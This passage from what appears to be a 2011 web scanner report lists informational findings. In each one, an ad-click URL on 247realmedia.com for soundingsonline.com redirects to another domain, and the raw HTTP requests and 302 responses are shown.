User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.482. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/837487534/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/837487534/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/837487534/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/837487534/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.485. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/860655786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/860655786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/860655786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/860655786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:31:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/877352963/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/877352963/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/877352963/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/881866547/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/881866547/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/881866547/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/886342725/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/886342725/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/886342725/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/890602703/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/890602703/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/890602703/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897177615/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897177615/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897177615/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:26:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/905894959/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/905894959/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/905894959/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

